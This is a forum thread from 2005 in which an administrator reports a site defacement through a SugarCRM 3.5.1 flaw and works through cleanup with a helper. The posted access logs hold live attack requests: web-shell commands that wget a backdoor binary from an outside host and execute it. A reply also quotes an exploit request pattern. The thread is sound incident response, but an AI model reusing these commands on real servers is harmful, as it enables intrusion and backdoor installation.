site defaced!

**mrshark** · 2005-12-13, 07:38 AM

my company site was defaced tonight, using a bug in sugarcrm 3.5.1, as the following logs say:

Code:

[root@www ~]# find /var/log/httpd/ -print | xargs grep r0nin
/var/log/httpd/error_log:--21:56:53--  http://www.illusor.altervista.org/r0nin
/var/log/httpd/error_log:           => `r0nin'
/var/log/httpd/error_log:21:56:54 (50.00 KB/s) - `r0nin' saved [19242/19242]
/var/log/httpd/error_log:sh: ./r0nin: Permission denied
/var/log/httpd/error_log:--21:57:43--  http://www.illusor.altervista.org/r0nin
/var/log/httpd/error_log:           => `r0nin.1'
/var/log/httpd/error_log:21:57:44 (49.18 KB/s) - `r0nin.1' saved [19242/19242]
/var/log/httpd/error_log:--21:58:23--  http://www.illusor.altervista.org/r0nin
/var/log/httpd/error_log:           => `r0nin.2'
/var/log/httpd/error_log:21:58:23 (49.29 KB/s) - `r0nin.2' saved [19242/19242]
/var/log/httpd/access_log:87.6.123.196 - - [12/Dec/2005:21:56:53 +0100] "GET /crm35/pointslash.php?cmd=cd%20/tmp;wget%20http://www.illusor.altervista.org/r0nin;chmod%20777;./r0nin HTTP/1.0" 200 - "-" "Vagabondo/2.0 MT"
/var/log/httpd/access_log:87.6.123.196 - - [12/Dec/2005:21:57:43 +0100] "GET /crm35/pointslash.php?cmd=cd%20/tmp;wget%20http://www.illusor.altervista.org/r0nin;chmod%20777 HTTP/1.0" 200 - "-" "Vagabondo/2.0 MT"
/var/log/httpd/access_log:87.6.123.196 - - [12/Dec/2005:21:58:23 +0100] "GET /crm35/pointslash.php?cmd=cd%20/tmp;wget%20http://www.illusor.altervista.org/r0nin;chmod%20777%20r0nin;./r0nin HTTP/1.0" 200 52 "-" "Vagabondo/2.0 MT"

any help? i think they used this: http://www.milw0rm.com/id.php?id=1364

**alsutton** · 2005-12-13, 12:39 PM

Can you confirm the following;

1) That you applied the 3.5.1e patch which came out a few days ago?
2) That you have in your access logs something like;

GET /crm35/acceptDecline.php?beanFiles[1]=/crm35/&beanList[1]=1&module=1

3) You've reported the breaking to the ISP for the IP address accessing pointslash.php (They are Telecom Italia Net, the Email is probably abuse@telecomitalia.it)

Thanks,

Al.

**alsutton** · 2005-12-13, 12:46 PM

I've just done a quick scan of the binary they downloaded and it's a backdoor program. You SHOULD look at the following thread to read about the implications of the back door and how to verify it's not doing anything nasty to your system...

http://forums.ev1servers.net/showthr...threadid=37871

**mrshark** · 2005-12-13, 01:53 PM

1) no, i applied the 3.5.1e patch only now...
2) the only part in my logs that refers to the intrusion is the one i posted
3) i used chkrootkit and rkhunter after removeing all instances of the rootkit, and they didn't find anything
4) i changed all the passwords, for security...
5) i do a yum update every day
6) now i closed the outgoing 80 port, so it cannot download anything (i open only for short, to do yum update)
7) i made also an rpm -Va, to test changed files
thanks a lot to all of you...